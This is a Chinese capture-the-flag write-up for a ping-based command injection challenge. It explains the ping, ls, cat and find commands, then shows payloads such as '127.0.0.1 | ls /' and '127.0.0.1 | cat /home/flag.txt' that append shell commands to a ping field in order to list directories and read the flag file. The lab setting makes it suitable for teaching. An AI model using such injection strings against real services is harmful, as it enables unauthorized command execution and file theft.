[CTF/网络安全] 攻防世界 command_execution 解题详析

简介: 题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。

题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。

image.png


ping命令

ping 命令是一个常用的网络命令,用于测试两台计算机之间网络连接的连通性。通过向目标计算机发送 ICMP 协议的数据包,并等待目标计算机返回响应数据包来测试网络的可达性,同时也可以测试网络的延迟和丢包率等信息。


在终端中使用 ping 命令的基本语法为:


ping <IP地址或主机名>

1

例如,要测试目标计算机的 IP 地址为 192.168.1.1 的网络连通性,可以运行以下命令:


ping 192.168.1.1

1

ping 命令将会输出一些关于网络连接的信息,包括每个数据包的传输时间、接收时间和延迟时间等。如果目标计算机能够正确响应 icmp 数据包,那么 ping 命令将会显示类似以下的信息:


这表示目标计算机成功返回了一个数据包,并花费了 4.56 毫秒的时间。如果无法连接到目标计算机,则 ping 命令将会显示类似以下的信息:


ping: connect: Network is unreachable

1

这表示无法连接到目标计算机。可以根据 ping 命令输出的信息排查网络故障,以便进行调试和修复网络连接问题。


ping命令的应用格式

ping+IP地址或主机域名

ping+IP地址或主机域名+命令参数

ping+命令参数+IP地址或主机域名

注意,+要换成空格

ping命令执行漏洞

如果 ping 命令不正确地处理其输入参数,就可能存在被攻击者利用来运行危险的命令的风险。

例如,如果在 ping 命令中使用了一个长度超过其预期的输入参数,则可能会导致该命令出现缓冲区溢出漏洞。


攻击者可以通过构造恶意输入参数来利用这种漏洞,并在受害者的计算机上执行任意代码,包括下载和安装恶意软件、破坏文件或系统配置、窃取敏感信息等。


该题可将输入参数截断从而让其运行危险的参数,常见的连接符有:


例如,ping127.0.0.1| ls /时,将显示ls /的执行结果,即列出目录


ls命令

ls 命令是一个常见的用于列出指定目录中的文件和子目录的命令,它通常用于 Unix、Linux 和 macOS 等操作系统中。该命令通常使用以下语法:


ls [OPTIONS] [FILE(S)]


其中 OPTIONS 是可选的命令参数,可以用于修改 ls 命令的行为。FILE(S) 是要列出的文件或目录的名称,也可以是通配符表达式,用于匹配符合特定模式的所有文件和目录。


以下是 ls 命令的一些常见选项:


-a:列出所有文件,包括隐藏文件。

-l:使用长格式显示文件详细信息,包括文件权限、所有者、大小、修改日期等。

-h:以人类可读的格式显示文件大小。

-t:按修改时间顺序列出文件和目录,最近修改的排在最前面。

-r:按相反顺序(即最早的先列出)列出文件和目录。

例如,要列出当前目录下的所有文件和目录,可以执行以下命令:


ls

1

要列出特定目录下的所有文件和目录,例如 /etc 目录,则可以执行以下命令:


ls /etc


您还可以使用不同的选项来修改 ls 命令的行为,例如:


ls -l /etc


该命令将以长格式列出 /etc 目录下的所有文件和子目录,并包括详细信息如权限、所有者、大小、修改日期等。


cat命令

cat 是一个常用的在 Linux 操作系统上查看文件内容的命令。cat 命令通常使用以下语法:


cat [OPTIONS] [FILE(S)]


其中,OPTIONS 是可选的命令参数,可以用于修改 cat 命令的行为。FILE(S) 是要查看内容的文件列表。


以下是一些常见的 cat 命令选项:


-n:显示每行行号。

-b:显示行号,但对于空白行不进行编号。

-E:在每行末尾显示 $ 符号。

-T:将制表符字符 (\t) 显示为 ^I。

-s:删除重复的空行,并将连续多个空行压缩成一个空行。

例如,要查看文件 /etc/fstab 中的内容,可以执行以下命令:


cat /etc/fstab


如果您想在行号前添加行号,可以使用 -n 选项:


cat -n /etc/fstab


该命令将显示 /etc/fstab 文件的内容,并在每行行首添加行号。


姿势

ping本地回环地址

Payload:127.0.0.1

image.png


本地回环地址是网络通信中的特殊地址,指向本机的网络接口,因此通过发送 icmp 数据包到该地址来测试网络连通性和延迟。


在这个命令中,参数 -c 3 表示 ping 命令将会发送三个 icmp 数据包到目标主机。结果显示,三个数据包都成功发送和接收,并且没有任何数据包丢失。最后一行输出了关于这三个数据包的一些统计信息,包括平均延迟时间等。


这个结果说明本机的网络回环接口工作正常,同时也可以用来测试 ping 命令是否正常工作。


需要注意的是,这个测试结果并不能完全代表主机与其他计算机之间的网络连接状态,因为本地回环地址并不经过网络硬件设备,因此不会受到网络拥塞和其他网络故障的影响。


由于接口工作正常,因此可进行命令执行


ping目录

Payload127.0.0.1| ls /

或127.0.0.1 && ls /



ping文件夹

Payload127.0.0.1 |ls /目录名

image.png



在home目录下找到flag文件:

image.png



ping文件

Payload127.0.0.1 | cat /home/flag.txt

image.png



Tips

在已知某文件名的基础上,可使用find命令:127.0.0.1 | find / -name "文件名"

如图:

image.png



在已知部分某文件名的基础上 ,可使用find命令:127.0.0.1 && find / -name "已知文件名的部分*"

如图:

image.png



总结

该题考察ping命令执行漏洞及Linux部分操作系统命令。

我是秋说,我们下次见。

目录
相关文章
|
缓存 网络协议 安全
【网络攻防战】DNS协议的致命弱点:如何利用它们发动悄无声息的网络攻击?
【8月更文挑战第26天】DNS(域名系统)是互联网的关键组件,用于将域名转换为IP地址。然而,DNS协议存在安全漏洞,包括缺乏身份验证机制、缓存中毒风险及放大攻击的可能性。通过具体案例,如DNS缓存中毒和DNS放大攻击,攻击者能够误导用户访问恶意站点或对目标服务器实施DDoS攻击。为了防范这些威胁,可以采用DNSSEC实现数字签名验证、利用加密的DNS服务(如DoH或DoT)、限制DNS服务器响应以及及时更新DNS软件等措施。理解并应对DNS的安全挑战对于确保网络环境的安全至关重要。
526 2
|
安全 网络安全 PHP
深入理解PHP的命名空间与自动加载机制网络安全与信息安全:防护之道与攻防之术
【5月更文挑战第29天】在PHP的开发实践中,命名空间和自动加载机制是两个重要的概念,它们共同构成了现代PHP代码组织的基础。本文将详细解释命名空间在PHP中的应用,探讨其解决代码冲突和提高代码复用性的能力,同时深入研究自动加载机制的原理及其在项目中的实际运用,帮助开发者构建更加高效、易于维护的PHP应用。
|
安全 网络安全 数据安全/隐私保护
网络安全与信息安全:防护之道与攻防之策
【5月更文挑战第29天】在数字化时代,网络安全与信息安全已成为维护个人隐私、企业资产和国家安全的重要屏障。本文深入探讨了网络安全漏洞的成因、加密技术的应用以及提升安全意识的必要性,旨在为读者提供一个全面的安全防护知识框架。通过对当前网络威胁的分析,我们揭示了安全漏洞的本质及其对信息系统的潜在影响,并介绍了最新的加密技术如何作为防御工具来保护数据传输的安全。此外,文章还强调了培养全民网络安全意识的重要性,提出了一系列实用的安全建议和最佳实践。
|
网络协议 安全 物联网
网络安全涨知识:基础网络攻防之DDoS攻击
网络安全涨知识:基础网络攻防之DDoS攻击
954 0
|
安全 网络安全 数据安全/隐私保护
网络攻防演练需要注意哪些
【8月更文挑战第14天】
559 1
|
消息中间件 Kafka Java
Spring 框架与 Kafka 联姻,竟引发软件世界的革命风暴!事件驱动架构震撼登场!
【8月更文挑战第31天】《Spring 框架与 Kafka 集成:实现事件驱动架构》介绍如何利用 Spring 框架的强大功能与 Kafka 分布式流平台结合,构建灵活且可扩展的事件驱动系统。通过添加 Spring Kafka 依赖并配置 Kafka 连接信息,可以轻松实现消息的生产和消费。文中详细展示了如何设置 `KafkaTemplate`、`ProducerFactory` 和 `ConsumerFactory`,并通过示例代码说明了生产者发送消息及消费者接收消息的具体实现。这一组合为构建高效可靠的分布式应用程序提供了有力支持。
255 0
|
SQL 安全 网络安全
网络安全攻防实战:黑客与白帽子的较量
【6月更文挑战第29天】网络安全战场,黑客与白帽子的博弈日益激烈。黑客利用漏洞扫描、DDoS、SQL注入等手段发起攻击,而白帽子则通过防火墙、入侵检测、数据加密等技术防守。双方在技术与智慧的较量中,未来将更多融入AI、区块链等先进技术,提升攻防效率与安全性。面对网络威胁,提升技能与意识至关重要。
|
SQL 安全 算法
网络安全与信息安全:防护之道与攻防之术
【5月更文挑战第29天】 在数字化时代,数据成为了新的石油。然而,随之而来的网络威胁却如同无形的盗贼,时刻觊觎着这些价值连城的“黑金”。本文将深入探讨网络安全漏洞的本质、加密技术的进展,以及提升安全意识的重要性。我们将透过技术的视角,分析如何构建一道坚固的数字防线,并讨论攻防双方的策略变化。通过案例剖析和最新研究成果,本文旨在为读者提供一份全面的网络安全与信息安全知识图谱。
|
存储 网络协议 数据建模
程序与技术分享:2021年第一届“东软杯”网络安全CTF竞赛
程序与技术分享:2021年第一届“东软杯”网络安全CTF竞赛
|
安全 网络安全 数据安全/隐私保护
CTF竞赛:一场网络安全技术的盛宴
CTF竞赛:一场网络安全技术的盛宴
535 0